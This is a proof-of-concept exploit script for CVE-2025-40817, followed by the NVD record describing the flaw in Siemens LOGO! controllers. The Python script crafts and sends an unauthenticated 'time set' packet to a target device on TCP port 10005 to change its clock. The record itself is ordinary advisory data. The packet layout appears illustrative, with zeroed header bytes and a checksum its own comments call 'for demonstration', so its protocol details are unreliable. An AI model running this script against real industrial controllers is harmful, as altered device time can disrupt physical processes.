CVE-2025-40817

# CVE-2025-40817 PoC - Siemens LOGO! Time Manipulation # This PoC demonstrates time modification attack on vulnerable LOGO! devices # Author: Security Researcher # Note: For authorized testing only import socket import struct import sys from datetime import datetime def craft_logo_time_packet(year, month, day, hour, minute, second): """ Craft LOGO! time modification packet LOGO! devices use proprietary protocol on port 10005/TCP or 10006/TCP """ # LOGO! protocol header protocol_header = b'\x00\x00\x00\x00' # Command type: Time set (0x01) cmd_time_set = b'\x01' # Reserved bytes reserved = b'\x00\x00' # Time data structure time_data = struct.pack('>H', year) # Year (big-endian) time_data += struct.pack('>B', month) # Month time_data += struct.pack('>B', day) # Day time_data += struct.pack('>B', hour) # Hour time_data += struct.pack('>B', minute) # Minute time_data += struct.pack('>B', second) # Second # Calculate checksum (simple XOR for demonstration) checksum = 0 for byte in cmd_time_set + reserved + time_data: checksum ^= byte # Construct full packet packet = protocol_header + cmd_time_set + reserved + time_data + bytes([checksum]) return packet def exploit_logo_time(target_ip, target_port=10005): """ Send malicious time packet to LOGO! device """ try: # Set target time (example: 2025-01-01 00:00:00) target_time = datetime(2025, 1, 1, 0, 0, 0) # Craft malicious packet packet = craft_logo_time_packet( target_time.year, target_time.month, target_time.day, target_time.hour, target_time.minute, target_time.second ) print(f"[*] Target: {target_ip}:{target_port}") print(f"[*] Crafted time packet for: {target_time.isoformat()}") print(f"[*] Packet hex: {packet.hex()}") # Send packet sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_ip, target_port)) sock.send(packet) # Receive response response = sock.recv(1024) print(f"[+] Response received: {response.hex()}") sock.close() return True except socket.timeout: print("[-] Connection timeout - device may not be vulnerable or not reachable") return False except Exception as e: print(f"[-] Error: {str(e)}") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-40817_poc.py <target_ip> [port]") sys.exit(1) target_ip = sys.argv[1] target_port = int(sys.argv[2]) if len(sys.argv) > 2 else 10005 print("=" * 60) print("CVE-2025-40817 - Siemens LOGO! Time Manipulation PoC") print("=" * 60) exploit_logo_time(target_ip, target_port)

{"cve": {"id": "CVE-2025-40817", "sourceIdentifier": "[email protected]", "published": "2025-11-11T21:15:38.453", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been identified in LOGO! 12/24RCE (6ED1052-1MD08-0BA2) (All versions), LOGO! 12/24RCEo (6ED1052-2MD08-0BA2) (All versions), LOGO! 230RCE (6ED1052-1FB08-0BA2) (All versions), LOGO! 230RCEo (6ED1052-2FB08-0BA2) (All versions), LOGO! 24CE (6ED1052-1CC08-0BA2) (All versions), LOGO! 24CEo (6ED1052-2CC08-0BA2) (All versions), LOGO! 24RCE (6ED1052-1HB08-0BA2) (All versions), LOGO! 24RCEo (6ED1052-2HB08-0BA2) (All versions), SIPLUS LOGO! 12/24RCE (6AG1052-1MD08-7BA2) (All versions), SIPLUS LOGO! 12/24RCEo (6AG1052-2MD08-7BA2) (All versions), SIPLUS LOGO! 230RCE (6AG1052-1FB08-7BA2) (All versions), SIPLUS LOGO! 230RCEo (6AG1052-2FB08-7BA2) (All versions), SIPLUS LOGO! 24CE (6AG1052-1CC08-7BA2) (All versions), SIPLUS LOGO! 24CEo (6AG1052-2CC08-7BA2) (All versions), SIPLUS LOGO! 24RCE (6AG1052-1HB08-7BA2) (All versions), SIPLUS LOGO! 24RCEo (6AG1052-2HB08-7BA2) (All versions). Affected devices do not conduct certain validations when interacting with them. This could allow an unauthenticated remote attacker to change time of the device, which means the device could behave differently."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://cert-portal.siemens.com/productcert/html/ssa-267056.html", "source": "[email protected]"}]}}